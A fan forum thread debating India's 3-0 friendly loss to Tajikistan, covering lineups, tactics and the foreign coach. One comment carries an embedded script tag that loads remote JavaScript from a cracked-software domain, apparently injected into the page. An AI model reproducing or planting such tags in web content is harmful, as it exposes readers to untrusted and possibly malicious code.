TAJIKISTAN VS INDIA FOOTBALL FRIENDLY

Comments

• harry191harry191 89 Points
    <P> india should opt for a counter attacking style of play and not possesion .currently we dont have that skilled lads.</P>
    <P> Gk:Karanjit Singh/Subrata Pal,Gurpreet Singh,</P>
    <P>use 5 defenders( LWB :Gurjinder Singh,LB: Prathmesh maulingkar/Denzil Franco, CB: Arnad Mondal/Wahid Sali ,RB:Anas Edathodika, RWB: Aibor Khongjee/Shouvik Ghosh.</P>
    <P>3 midfielders( LCM: Ralte/Raja  ,CM:Lalkamal/Mehtab/Lenny,  RCM : Lester Fernandez/Sanju Pradhan</P>
    <P>1 CM ,just behind striker(Arata/ Alwyn george)</P>
    <P>1 striker( Chettri/Eugenson lyngdoh/uttam rai)</P>
    <P> </P>
    <P>atleast bring some freshness in attack and keep that shitty defense in place.</P>
    <P> 3 fullbacks  to stay just oustied the box and LWb/RWBoverlapping runs with MF's.</P>
    <P>Bring in the softer versionof greece football 2004 style.</P>
    <P>atleaset we wont be hammerred by silly opposition in 3-0 fashion.</P>
    <P> </P>
    <P>and are we going to look beyond saff cup.( i dont care about it) </P>
    <P>change your region to asean( atleat you willhave some decent competion like thailand,malaysia,singapore,indonesia, vietnam) .</P>
    <P>how can we improve playing non standard team liks bhutan and srilanka and pakistan.</P>
    <P>dare on and try to qualify for afc cup 2019 in proper qualifying ways and not through back door/</P>
  • AKBAKB Kolkata3039 Points
    <font face="Comic Sans MS" color="#000099">Why do we have a Coach ? It is argued that we don't have quality players...it is true no doubt, but a Coach should atleast make them presentable. Whenever India plays against any opponent (be it Nepal/Pakistan/Sri Lanka etc.) a win is a pleasant surprise. </font><div><font face="Comic Sans MS" color="#000099">If the argument for the Coach is <i><b>lack of quality players then why you appoint a Foreign Coach by paying him a fortune ? Isn't he accountable ? What's wrong with Sukhwinder Singh or Armando Colaco or Subhash Bhowmik or Derek Periera ? Is it because they are Indians ?</b></i>  <b>Why the World goes ga ga over Sir Alex ? </b></font></div><div><font face="Comic Sans MS" color="#000099">You take the example of Everton FC...they have had a set of mediocre players (EPL standard) for the last 7-10 years, so they do not aspire to be EPL Champions but put them against big guns like MU, Chelsea, Liverpool the boys always give a standout performance and the credit goes to David Moyes. MU didn't decide to take him for nothing, they realized his potential, contribution and ability. Now this is what a good Coach can do and should do. Unfortunately our present Coach has failed in this aspect. <b><i>The same logic of not having quality players is never raised in case of Sukhwinder Singh, Armando Colaco, Subhash Bhowmik or Derek Periera.</i></b> <b><i>One poor performance and they are shown the door.</i></b> </font></div><div><font face="Comic Sans MS" color="#000099">The way AIFF functions the dream of having quality players in our line up is a wishful thinking but keeping a white elephant is a crime. Sooner we get rid of this mentality the better. Today the competition is cut throat and you have to perform or perish. If it is applicable to Players & Indian Coaches why it can't be applicable to Foreign Coaches ? Simply <b>"we are learning" type comment after every defeat</b> is disgusting.</font></div>
  • AkoiAkoi 2 Points
    I really want to hunt someone's head calling some of the fans here as BAD people. How bad i am???<div><br></div><div>WIM is totally responsible for flop show by Indian team. He doesnt have a clear vision. Buddha kahika!</div>
  • munna219777munna219777 28505 Points
    Team Selection is in the hands of Coach. I feel that this was not the best playing XI. Persisting with Sandip Nandy, Raju, Gouramangi after Palestine loss, AFC qualifiers loss and now this Tajikistan.  Bob was a little better in Team selection.<br>
  • DXDX 4074 Points
    Team Selection is in the hands of Coach. I feel that this was not the best playing XI. Persisting with Sandip Nandy, Raju, Gouramangi after Palestine loss, AFC qualifiers loss and now this Tajikistan.  Bob was a little better in Team selection.<br>
    <div><br></div><div>Dont exactly agree with that post there buddy, Bob went after reputation and not current form, It was his luck that chettri had his best years up front with gourmangi & subrata with nabi playing well, but his brand of football was seriously killing our skills. Indians are not good at the long ball game, Period. </div><div><br></div><div>Wim on the other hand so far hasnt selected his team based on reputation, Its the current form he looks at, Nandy though sucked at goal in that friendly against palestine, deserved another game cos quite frankly he was the best goalkeeper in the I-league. He had no other option but to play gourmangi cos he didnt have options there. He sets the team up to play the right way, Keep the ball on the floor. Quite frankly i dont mind losing a few more friendlies against better opposition as long as we get our indian style of play for the future. </div>
  • ArsenalFan700ArsenalFan700 Reddit13655 Points
    How do you know he plays the ball on the ground? The only time we have all actually seen this team play was during the Nehru Cup and that one game during the AFC Challenge Cup and the Palestine matches. Other than that it is impossible to make a judgement right now.<div><br></div><div>Like I said pages ago, everything is so messed up right now.</div>
  • ashindiaashindia 9254 Points
    These players can never play the style you guys are talking about. Even if you want them to play guys like Gouramangi are prone to school boy like errors.<br><br><br>As for Wim he needs to win the SAFF Cup or else he's good for nothing, what is purpose of paying crores and seeing no different result<br><br>With all the issues right now it will be very difficult for India to qualify for next 2 Asian Cups forget World Cup.<br><br>The only short-cut is bring foreign based players which unfortunately never gonna happen thanks to shit Govt.<br><script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>
  • India lost 3-0 sad day for indian football. we need to work towards national team development!
  • <span style="color: rgb(64, 64, 64); font-family: Verdana, Geneva, sans-serif; font-size: 10px; line-height: 12.727272033691406px; text-align: justify; background-color: rgb(255, 255, 255);">please visit my blog on indian football! </span><br style="color: rgb(64, 64, 64); font-family: Verdana, Geneva, sans-serif; font-size: 10px; line-height: 12.727272033691406px; text-align: justify; background-color: rgb(255, 255, 255);"><br style="color: rgb(64, 64, 64); font-family: Verdana, Geneva, sans-serif; font-size: 10px; line-height: 12.727272033691406px; text-align: justify; background-color: rgb(255, 255, 255);"><span style="color: rgb(64, 64, 64); font-family: Verdana, Geneva, sans-serif; font-size: 10px; line-height: 12.727272033691406px; text-align: justify; background-color: rgb(255, 255, 255);">http://understandingindianfootball.blogspot.com/</span>;
  • RonnyRonny 10457 Points
    <h5 class="uiStreamMessage userContentWrapper" data-ft="{"type":1,"tn":"K"}"><span class="messageBody" data-ft="{"type":3}"><span class="userContent"><a href=" rel="nofollow nofollow" target="_blank"><span>http://www.youtube.com/</span><wbr><span class="word_break"></span>watch?v=7BBmCKjxpGE</a></span></span></h5>